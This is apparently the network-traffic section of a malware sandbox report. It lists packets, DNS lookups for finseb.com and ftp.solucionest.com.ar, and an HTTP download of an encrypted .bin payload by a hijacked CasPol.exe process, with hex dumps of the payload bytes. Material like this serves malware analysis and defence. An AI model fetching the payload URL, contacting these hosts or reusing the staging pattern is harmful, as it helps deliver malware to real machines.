                                                                                    May 11, 2022 14:51:32.520375013 CEST44349761131.226.4.8192.168.11.20
                                                                                    May 11, 2022 14:51:32.520392895 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:32.520476103 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:32.520559072 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:32.520752907 CEST44349761131.226.4.8192.168.11.20
                                                                                    May 11, 2022 14:51:32.520901918 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:32.520930052 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:32.520945072 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:32.521006107 CEST44349761131.226.4.8192.168.11.20
                                                                                    May 11, 2022 14:51:32.521020889 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:32.521100044 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:32.521141052 CEST44349761131.226.4.8192.168.11.20
                                                                                    May 11, 2022 14:51:32.521156073 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:32.521260977 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:32.521409988 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:32.630400896 CEST44349761131.226.4.8192.168.11.20
                                                                                    May 11, 2022 14:51:32.630611897 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:32.630687952 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:32.631339073 CEST44349761131.226.4.8192.168.11.20
                                                                                    May 11, 2022 14:51:32.631496906 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:32.631575108 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:32.632074118 CEST44349761131.226.4.8192.168.11.20
                                                                                    May 11, 2022 14:51:32.632242918 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:32.632342100 CEST44349761131.226.4.8192.168.11.20
                                                                                    May 11, 2022 14:51:32.632477999 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:32.632520914 CEST44349761131.226.4.8192.168.11.20
                                                                                    May 11, 2022 14:51:32.632539034 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:32.632617950 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:32.632682085 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:32.632772923 CEST44349761131.226.4.8192.168.11.20
                                                                                    May 11, 2022 14:51:32.632917881 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:32.632941961 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:32.633018970 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:32.633270025 CEST44349761131.226.4.8192.168.11.20
                                                                                    May 11, 2022 14:51:32.633483887 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:32.633533955 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:32.633613110 CEST44349761131.226.4.8192.168.11.20
                                                                                    May 11, 2022 14:51:32.633790016 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:32.633925915 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:32.634030104 CEST44349761131.226.4.8192.168.11.20
                                                                                    May 11, 2022 14:51:32.634167910 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:32.634196043 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:32.634208918 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:32.634284019 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:32.634654999 CEST44349761131.226.4.8192.168.11.20
                                                                                    May 11, 2022 14:51:32.634809971 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:32.634838104 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:32.634850979 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:32.634924889 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:32.635036945 CEST44349761131.226.4.8192.168.11.20
                                                                                    May 11, 2022 14:51:32.635186911 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:32.635273933 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:32.635483980 CEST44349761131.226.4.8192.168.11.20
                                                                                    May 11, 2022 14:51:32.635736942 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:32.635813951 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:32.671647072 CEST44349761131.226.4.8192.168.11.20
                                                                                    May 11, 2022 14:51:32.671844959 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:32.671895027 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:32.744980097 CEST44349761131.226.4.8192.168.11.20
                                                                                    May 11, 2022 14:51:32.745197058 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:32.745250940 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:32.745389938 CEST44349761131.226.4.8192.168.11.20
                                                                                    May 11, 2022 14:51:32.745533943 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:32.745559931 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:32.745592117 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:32.745606899 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:32.745654106 CEST44349761131.226.4.8192.168.11.20
                                                                                    May 11, 2022 14:51:32.745806932 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:32.745874882 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:32.746027946 CEST44349761131.226.4.8192.168.11.20
                                                                                    May 11, 2022 14:51:32.746186018 CEST44349761131.226.4.8192.168.11.20
                                                                                    May 11, 2022 14:51:32.746191025 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:32.746334076 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:32.746459007 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:32.746520996 CEST44349761131.226.4.8192.168.11.20
                                                                                    May 11, 2022 14:51:32.746531010 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:32.746634007 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:36.585141897 CEST8049760131.226.4.8192.168.11.20
                                                                                    May 11, 2022 14:51:36.585406065 CEST4976080192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:53:21.073061943 CEST4976080192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:53:21.385265112 CEST4976080192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:53:22.010268927 CEST4976080192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:53:23.260152102 CEST4976080192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:53:25.743711948 CEST4976080192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:53:30.695931911 CEST4976080192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:53:40.584223986 CEST4976080192.168.11.20131.226.4.8
                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    May 11, 2022 14:51:31.139024019 CEST6310453192.168.11.201.1.1.1
                                                                                    May 11, 2022 14:51:31.351368904 CEST53631041.1.1.1192.168.11.20
                                                                                    May 11, 2022 14:51:31.583333015 CEST5071753192.168.11.201.1.1.1
                                                                                    May 11, 2022 14:51:31.662651062 CEST53507171.1.1.1192.168.11.20
                                                                                    May 11, 2022 14:51:44.529633999 CEST5532053192.168.11.201.1.1.1
                                                                                    May 11, 2022 14:51:45.531805038 CEST5532053192.168.11.209.9.9.9
                                                                                    May 11, 2022 14:51:45.535309076 CEST53553209.9.9.9192.168.11.20
                                                                                    May 11, 2022 14:51:45.557099104 CEST53553201.1.1.1192.168.11.20
                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                    May 11, 2022 14:51:31.139024019 CEST192.168.11.201.1.1.10x6b66Standard query (0)finseb.comA (IP address)IN (0x0001)
                                                                                    May 11, 2022 14:51:31.583333015 CEST192.168.11.201.1.1.10x710fStandard query (0)www.finseb.comA (IP address)IN (0x0001)
                                                                                    May 11, 2022 14:51:44.529633999 CEST192.168.11.201.1.1.10xb26dStandard query (0)ftp.solucionest.com.arA (IP address)IN (0x0001)
                                                                                    May 11, 2022 14:51:45.531805038 CEST192.168.11.209.9.9.90xb26dStandard query (0)ftp.solucionest.com.arA (IP address)IN (0x0001)
                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                    May 11, 2022 14:51:31.351368904 CEST1.1.1.1192.168.11.200x6b66No error (0)finseb.com131.226.4.8A (IP address)IN (0x0001)
                                                                                    May 11, 2022 14:51:31.662651062 CEST1.1.1.1192.168.11.200x710fNo error (0)www.finseb.comfinseb.comCNAME (Canonical name)IN (0x0001)
                                                                                    May 11, 2022 14:51:31.662651062 CEST1.1.1.1192.168.11.200x710fNo error (0)finseb.com131.226.4.8A (IP address)IN (0x0001)
                                                                                    May 11, 2022 14:51:45.535309076 CEST9.9.9.9192.168.11.200xb26dName error (3)ftp.solucionest.com.arnonenoneA (IP address)IN (0x0001)
                                                                                    May 11, 2022 14:51:45.557099104 CEST1.1.1.1192.168.11.200xb26dNo error (0)ftp.solucionest.com.arsolucionest.com.arCNAME (Canonical name)IN (0x0001)
                                                                                    May 11, 2022 14:51:45.557099104 CEST1.1.1.1192.168.11.200xb26dNo error (0)solucionest.com.ar192.185.112.181A (IP address)IN (0x0001)
                                                                                    • www.finseb.com
                                                                                    • finseb.com
                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    0192.168.11.2049761131.226.4.8443C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                    TimestampkBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    1192.168.11.2049760131.226.4.880C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    May 11, 2022 14:51:31.470997095 CEST5970OUTGET /qwer/COrg_ZBOJvB194.bin HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                    Host: finseb.com
                                                                                    Cache-Control: no-cache
                                                                                    May 11, 2022 14:51:31.580470085 CEST5971INHTTP/1.1 301 Moved Permanently
                                                                                    Date: Wed, 11 May 2022 12:51:31 GMT
                                                                                    Server: Apache
                                                                                    Location: https://www.finseb.com/qwer/COrg_ZBOJvB194.bin
                                                                                    Content-Length: 254
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 69 6e 73 65 62 2e 63 6f 6d 2f 71 77 65 72 2f 43 4f 72 67 5f 5a 42 4f 4a 76 42 31 39 34 2e 62 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.finseb.com/qwer/COrg_ZBOJvB194.bin">here</a>.</p></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    0192.168.11.2049761131.226.4.8443C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    2022-05-11 12:51:32 UTC0OUTGET /qwer/COrg_ZBOJvB194.bin HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                    Cache-Control: no-cache
                                                                                    Host: www.finseb.com
                                                                                    Connection: Keep-Alive
                                                                                    2022-05-11 12:51:32 UTC0INHTTP/1.1 200 OK
                                                                                    Date: Wed, 11 May 2022 12:51:32 GMT
                                                                                    Server: Apache
                                                                                    Last-Modified: Wed, 11 May 2022 06:47:14 GMT
                                                                                    Accept-Ranges: bytes
                                                                                    Content-Length: 214592
                                                                                    Connection: close
                                                                                    Content-Type: application/octet-stream
                                                                                    2022-05-11 12:51:32 UTC0INData Raw: c5 6f 5e 2d 2f ae c6 d1 6e d5 56 f2 81 cd 1d bd 7c 0e 54 3d 74 74 d6 20 d0 24 98 51 fa e2 7c 93 cf 8c fc f6 1b 08 94 51 24 e4 6c 40 3d c3 0f 53 76 c8 e4 d0 3c 64 7c 24 05 0c 2f a1 c9 fa a7 ac 73 61 3b ec 40 52 ad 5e 79 f8 37 17 c3 ee 49 c6 c7 1a c9 b9 0f cb 97 12 ad c6 c1 fe a2 c4 5d 33 fb 78 bd 94 d3 06 59 60 7d 49 62 84 dd fa aa 64 63 77 b3 1a 55 ab e1 fd 28 5d 0c 8e 7d 87 f9 5e f8 47 3d 44 84 34 a7 27 6f 3f 72 ae 65 b8 33 b4 03 68 04 c6 c5 4e 35 04 d9 bd c5 63 c1 a2 27 3b 57 dc d2 ea fc fc b9 ed 3a fd 7c 64 3f 6c f1 55 07 13 3f 02 a5 51 23 7a 72 2f 99 16 df 19 5c 2c 63 68 bd 56 e3 b1 90 0c 6f e0 ea ad 9d cb 0b 00 16 f3 36 6d 9c e4 a4 62 6a 85 37 fa e6 97 dd 20 7e 87 ee d5 88 e9 bd d0 e7 ba ab 1d cf 7d 51 8c 93 81 43 c9 ef 73 ea 4b 70 86 63 99 34 5d 2a
                                                                                    Data Ascii: o^-/nV|T=tt $Q|Q$l@=Sv<d|$/sa;@R^y7I]3xY`}IbdcwU(]}^G=D4'o?re3hN5c';W:|d?lU?Q#zr/\,chVo6mbj7 ~}QCsKpc4]*
                                                                                    2022-05-11 12:51:32 UTC8INData Raw: 67 81 4f 27 61 5f 40 ef 16 df 13 4f 23 22 22 ce 21 af b0 99 1f d8 56 dc a0 e5 cb 0b 0a 05 fd e8 5f 59 cc 8b 63 61 8e 2f ea f7 a2 f2 2a 6f 86 81 ae 88 e9 b7 c4 5a e8 80 33 cf 5d 5b 52 86 95 50 c1 33 ad a5 6e 58 8b 63 99 3e 4c 3b 0a f9 d5 c1 12 5d eb 3f 69 85 bc 65 75 1e 8b fd 7b 08 f3 c7 5d 04 6b 1b 94 3e 07 b2 fc 00 00 61 d6 98 75 ae c2 ad 42 8b 8f a5 8a 4d 46 0f b8 db a0 34 07 b3 4c 6f 96 af bc 3d 87 ea e8 41 78 a9 70 6f 38 b6 37 c6 27 41 83 50 29 a2 08 85 9d 87 35 9c ee f7 64 42 d3 71 cf 58 70 54 54 65 0e 59 ac b4 06 66 e7 5f ac cf 2f b6 c9 71 d2 c0 d6 c1 f9 e3 75 2d f1 8b 1d 75 8f ab 14 83 3a 9e 6a 55 cb e1 72 34 c0 24 f4 ca ba 47 34 af 2a 78 83 0f 76 25 17 1c 5d f9 4a e4 de 2e 64 df c0 6e dd ad ac 10 7a 66 e6 d3 55 bf 69 4e 51 f1 85 ee 9a 1b 42 d0 24
                                                                                    Data Ascii: gO'a_@O#""!V_Yca/*oZ3][RP3nXc>L;]?ieu{]k>auBMF4Lo=Axpo87'AP)5dBqXpTTeYf_/qu-u:jUr4$G4*xv%]J.dnzfUiNQB$
                                                                                    2022-05-11 12:51:32 UTC16INData Raw: 36 7b 41 46 18 a0 3c 3c 73 70 69 3a 4b e6 fe 86 74 ee a4 27 75 db d8 b8 d4 83 a7 1f 4b 6d 41 d1 5f 39 c2 53 42 f1 58 85 9b 04 52 2c 3a 36 a3 6f 99 63 a0 d1 d5 b6 61 38 e0 5a 3e 20 8b 8f 2b 8b 72 b0 11 57 db a7 8b f3 f3 e1 f5 b3 dc 2e e1 03 a4 d5 eb 30 80 74 b1 ea bc 57 38 5b cf b0 46 33 ae a9 dd c2 39 1f 8e ad b2 95 14 63 f4 20 e3 ad 20 8a c2 ac d6 97 0e c1 d9 4d 53 11 23 48 b7 c2 a6 44 60 0f 12 83 0c c0 c0 a7 d1 99 a2 1e 6f c3 52 5c c7 70 df b4 56 03 ec 2b f4 f1 46 01 94 00 bc a1 1e ef 72 24 c6 f0 e3 47 66 12 9a 15 05 43 42 42 f1 5b c1 7c e7 43 65 94 5b 92 21 82 ad 9e c7 fc ed 0e c7 7f 28 9c 45 14 60 85 1d d7 86 a9 08 2e a6 53 97 31 4c 73 cb 8e 55 97 10 cc f0 af 96 ff 95 7d 97 54 a0 df aa 2c 4b c5 67 e5 c4 c0 a7 f3 8f 1b f9 11 c3 d4 2f b6 93 62 bf 52 f9
                                                                                    Data Ascii: 6{AF<<spi:Kt'uKmA_9SBXR,:6oca8Z> +rW.0tW8[F39c MS#HD`oR\pV+Fr$GfCBB[|Ce[!(E`.S1LsU}T,Kg/bR
                                                                                    2022-05-11 12:51:32 UTC23INData Raw: a5 58 86 38 57 fb 58 9d 50 91 ce 19 f1 a8 87 f8 a2 39 a5 4d d4 fe 89 2c 4f e7 40 1d c5 c6 89 bf 01 1b f3 97 db dc 38 64 5d cc aa 5a e8 5d b3 fa da 38 58 58 e9 07 0b a5 df 91 22 75 59 b7 93 eb ab 71 73 55 b1 37 c6 0d c5 54 99 d2 e6 9c d7 6d 10 62 8a 06 30 9f 94 aa a1 ea 77 d5 47 d4 ae 80 58 3f 1d b9 e1 69 c5 1c 1e d5 46 cf db a2 9c 0f 13 e5 c7 87 fc fd 84 cc 05 73 2c 6a 56 55 52 c0 71 4a 0f f1 86 3c e3 07 2e 26 83 b4 48 27 28 90 ad 97 da 8d 27 94 b9 50 0e 3a 3b 09 a2 ba cc b7 35 14 ea 19 3b 3e e4 8b 07 d6 8d 1a db 92 a9 05 3a 36 f7 7a ff 78 2a 97 18 9c 0d c0 e5 d6 45 28 46 bc ca 29 d7 07 b9 80 4e 5f bd 6e 75 df c4 a5 94 ca e1 cd ff aa 94 ba 34 6b 38 f4 55 e7 ae de 0e 0e c1 6a 70 c2 51 a2 57 19 b5 bc c1 f7 ae 36 ee de 18 4e 3b 3b ba e9 59 ac ac 72 78 ee 3c
                                                                                    Data Ascii: X8WXP9M,O@8d]Z]8XX"uYqsU7Tmb0wGX?iFs,jVURqJ<.&H'('P:;5;>:6zx*E(F)N_nu4k8UjpQW6N;;Yrx<
                                                                                    2022-05-11 12:51:32 UTC31INData Raw: 1a a7 ec fc dc ba 34 61 02 e0 3f 68 be db 1b 10 37 05 7c 9d 18 dc 1f 73 f5 da f9 5c af 34 95 8f 0b 5d 3a 54 f4 ed 43 58 b7 34 a7 eb 30 15 47 5f 49 c6 7b 06 a3 ae 60 b9 96 12 e7 e0 c6 91 32 c5 5d 39 95 6b b5 93 bc 97 58 60 77 23 71 80 da 95 25 65 63 7d dd 17 52 c4 71 fc 28 57 1f 88 ff fc b7 5e f6 5c e8 15 85 80 a4 66 1b 87 73 e3 bb 9c 6e c9 04 5b a8 b6 b7 21 50 0d f6 d0 e5 04 b1 cb 56 40 49 26 df f1 dd 8e c6 84 75 1b 13 44 71 2f aa 1b 4a 2c 10 61 8c 36 00 77 40 25 44 16 de 19 5c 2e 48 63 bd 56 ab aa f9 1b ba 35 d0 cf 97 ed 0c 6f 84 f2 36 67 6f ed a4 18 2f 84 3c fe f7 a2 b1 5e 7f 8f e4 d2 e7 66 bc d0 43 ed a0 73 ef 0d 1a 8a 95 eb 6d ce f9 79 77 8f 70 a6 63 9b 4f 11 2a 22 d3 ca dd 72 94 84 67 68 85 b6 02 16 71 19 fe 7b 02 e0 5f 5a 6b f9 7e 94 34 14 42 fb 6f
                                                                                    Data Ascii: 4a?h7|s\4]:TCX40G_I{`2]9kX`w#q%ec}Rq(W^\fsn[!PV@I&uDq/J,a6w@%D\.HcV5o6go/<^fCsmywpcO*"rghq{_Zk~4Bo
                                                                                    2022-05-11 12:51:32 UTC39INData Raw: 99 8d 5e da ea 73 bb 4e 67 58 62 b5 37 47 39 27 d7 c4 c4 01 7d ea 39 62 86 be 57 fe 1e 8b f9 70 12 e0 52 5d 15 6e 67 6a 3f 2b 4d fe 03 73 98 d6 98 73 a4 db be 47 8b 9e a0 94 37 46 23 af fa 85 ca 00 e8 4d 6f 90 c1 e8 3d 87 fd 9b 14 79 ab 7a 62 27 3b 25 c3 27 13 86 46 d7 64 25 86 8a 90 30 9c ff f2 7b 48 2d 70 e3 5a 5b 51 6c 4a f1 6b 52 9e 18 a9 fd 6f ae c0 14 b6 c9 6c ae c0 d7 c3 dd ec 61 0b f0 8d 69 1b 8f ab 04 86 2d 88 56 6e 52 e0 72 3e c0 24 e1 f7 43 40 6c d1 23 67 8c 5b 68 0d d3 19 ff ec 4e 6d d1 f0 7b fe f4 bd dc 81 ad 14 4b 60 41 d1 5f 67 cb 54 68 f5 84 ef 9e 04 52 2e 05 22 56 45 b5 74 6f d8 d5 b7 76 20 ec 58 72 23 a3 ac 56 8b 78 21 0e 44 c0 9b 68 ac f6 e1 f5 a0 d8 17 f1 e4 db f0 e1 21 8f 46 6d fb b7 4e 34 6b d4 b0 5d a8 b8 92 23 c7 c8 28 8d aa dd a8
                                                                                    Data Ascii: ^sNgXb7G9'}9bWpR]ngj?+MssG7F#Mo=yzb';%'Fd%0{H-pZ[QlJkRolai-VnRr>$C@l#g[hNm{K`A_gThR."VEtov Xr#Vx!Dh!FmN4k]#(
                                                                                    2022-05-11 12:51:32 UTC47INData Raw: ac 2b 8b f4 30 18 46 d9 a0 28 c3 f6 e1 f1 de d2 09 d2 1c c9 d9 fa 35 92 74 7e e9 bc 5b 03 7c de b4 64 27 a6 a9 d7 cb e6 39 06 a1 b2 97 10 58 c0 28 9a b2 5e e3 c6 84 d9 37 1f c0 e6 79 7b 82 28 c8 b4 60 b7 47 a5 15 99 34 24 51 de 82 e8 22 cd 10 76 c7 f4 65 cc 1d cd b3 7e 26 e0 28 80 60 4e 01 9e 7a 0f a1 1b eb 77 2f c8 d3 d8 56 96 ac 8c 3d c4 6b 4f 46 e2 5b f8 59 f1 bd 6c 1e 54 be 36 ae 8d 7e c3 fa fc 0a 54 d7 1b 85 3a 35 ab 84 19 f5 fb 44 09 28 84 0a 9e 1b 46 f3 d1 be 53 93 bc 08 f4 af 1b fd 8a 4f b2 40 dd d2 be 3a 5d ee 7e cf 07 c6 8f d6 9c 1f e2 95 dc 2a 2c b8 48 e8 ac 7a 04 56 3d 4b f9 ec d0 f6 81 06 0a 87 07 94 33 7b 39 53 84 f8 ab 20 66 53 60 31 1a 1a f9 52 9b d0 e4 9f d3 41 fb 66 9b 05 d1 b9 86 a9 b1 d3 be c2 91 c1 b7 95 43 2a 00 c9 55 50 1e 1a 09 fd
                                                                                    Data Ascii: +0F(5t~[|d'9X(^7y{(`G4$Q"ve~&(`Nzw/V=kOF[YlT6~T:5D(FSO@:]~*,HzV=K3{9S fS`1RAfC*UP
                                                                                    2022-05-11 12:51:32 UTC55INData Raw: ba ad db a1 5a 65 2b 59 27 cc 9d d0 7a 88 d2 f7 9c ae 70 eb 63 8e 28 4b 0d 94 ac 8f 2e 7d c2 9b a8 47 90 52 24 10 1f 43 58 19 30 60 e0 47 dc ef 8e 8a 2a 11 e3 ef 00 fc fd 9f b5 f5 77 14 78 52 7d 45 c3 60 49 6f 3a 86 10 ee 17 fd 25 83 b2 7f fb 3b 95 a7 e9 3c 9b d9 9f 93 7b 0f 2a 3e 0f cd 8a d2 a1 cf 3d dc 11 39 2c b1 10 07 d6 83 6a 2f 80 ac 0f 2d 1b f3 6a 01 7f 78 ad 1b e7 5a e8 f9 d1 7f f7 6f 9f ca 36 c9 7b 5f 81 5f 50 a0 b8 69 f0 ca a1 91 af e0 cd ff bb b0 b8 34 6d 0c 32 50 e7 b5 b4 f2 1d 3f 61 5a e5 4c da 19 1f cb 8d f9 5c ab 1e ce c2 0b 5b 16 ee ab ec 49 3d 4e 5f 7d f2 31 3f 1d 12 49 c0 01 2f c8 b9 0b e3 b5 11 ed c0 e9 2b a2 c4 57 5c 18 79 bd 9e d5 2e 7a 63 7d 4f 1c b1 dc fa ae 4c 47 74 b3 1c 7d 7e e1 fd 22 32 ef 8f fd 8d ff 76 d3 5b 87 4c fa b5 af ea
                                                                                    Data Ascii: Ze+Y'zpc(K.}GR$CX0`G*wxR}E`Io:%;<{*>=9,j/-jxZo6{__Pi4m2P?aZL\[I=N_}1?I/+W\y.zc}OLGt}~"2v[L
                                                                                    2022-05-11 12:51:32 UTC62INData Raw: d6 84 c6 5d 39 e9 7a 95 bc d1 06 53 b0 d8 49 62 85 f5 ee aa 64 69 5f 4e 1a 55 a1 8b 2b 00 5d 0d 8e f7 8b 87 4f f7 58 8d 59 8b 91 a4 fb 43 e8 5a e0 a8 93 4b d1 7b 11 35 bb d8 0b 50 76 b2 c3 f7 2b af de 44 aa 35 59 b0 8f dd e1 d9 83 1a 9e 01 56 69 2e b4 67 65 54 e1 67 8b 5a a2 21 56 2f 98 05 d9 08 5a 3a bf 7c bd 56 ae a6 bb f5 d5 47 db e3 98 f3 d2 02 16 f3 20 7e 6c 9a b7 62 61 8e 2f eb f7 a4 fe 20 7c 8f ee c7 98 fb ac f8 f7 e1 a8 1b 43 0c 51 8c 92 92 45 d8 e9 65 26 1a 70 a6 62 8f 1c a6 2a 22 dd f9 c4 20 20 e9 15 69 94 ad 37 1d 0f 9b e9 45 9f f1 57 5d 13 7a 6f 87 15 14 55 c4 82 02 77 d6 89 79 bf c5 85 57 8a 8f af a2 d8 47 0f b2 ee b5 1c 2c 1b 4d 65 88 81 a5 2f 8b e5 e4 69 51 a9 70 65 29 35 1e 3b 27 02 89 3a ff 4d 25 87 9d 89 1e 84 fc fb 76 4e fb 5c cd 58 7a
                                                                                    Data Ascii: ]9zSIbdi_NU+]OXYCZK{5Pv+D5YVi.geTgZ!V/Z:|VG ~lba/ |CQEe&pb*" i7EW]zoUwyWG,Me/iQpe)5;':M%vN\Xz
                                                                                    2022-05-11 12:51:32 UTC70INData Raw: b2 d5 f8 36 07 13 65 ba 95 b2 ba 35 90 21 ff 69 2d a9 70 65 10 6a 34 c6 2d 63 ab 06 2b 65 03 ad ca 81 35 96 c6 ae 66 42 d9 79 d8 8e 6e 09 58 74 02 83 7b a7 0a ba ea 4e bc f1 98 a7 ce 03 d5 c1 d7 d8 df c9 4c 72 c8 8a 1d 6e 9c a1 14 9f 01 4c 51 46 cf 8e 33 35 d1 26 fa d1 55 41 77 9f 22 67 8b 60 61 34 13 77 c0 e7 58 f1 cb 24 5d 0c df 90 da ee e4 18 63 48 47 c0 5f d6 0c 52 42 ff 94 f1 f1 ae 52 2e 2f 18 f2 90 4a 85 00 ce c4 b8 10 29 e9 58 3f 0a af bd 25 fe 41 30 18 56 b4 fe 56 a9 fc 3d 2b a4 e6 20 ff 1a da d6 f8 3d f7 49 b9 e8 b6 5a 38 56 cf b0 46 6d a5 af f7 c1 ce 23 8b ec 86 97 0b 49 c7 39 9d d4 20 8a c6 e5 dc 95 0e 16 f0 6e 53 07 29 c8 be c2 a6 40 bd 11 17 83 0c c4 df 82 e2 63 dd 17 6f 2a 57 74 cb 67 df b2 7e 3d ec 2b ff 6a 7f 05 94 33 60 a1 1b 56 72 26 c8
                                                                                    Data Ascii: 6e5!i-pej4-c+e5fBynXt{NLrnLQF35&UAw"g`a4wX$]cHG_RBR./J)X?%A0VV=+ =IZ8VFm#I9 nS)@co*Wtg~=+j3`Vr&
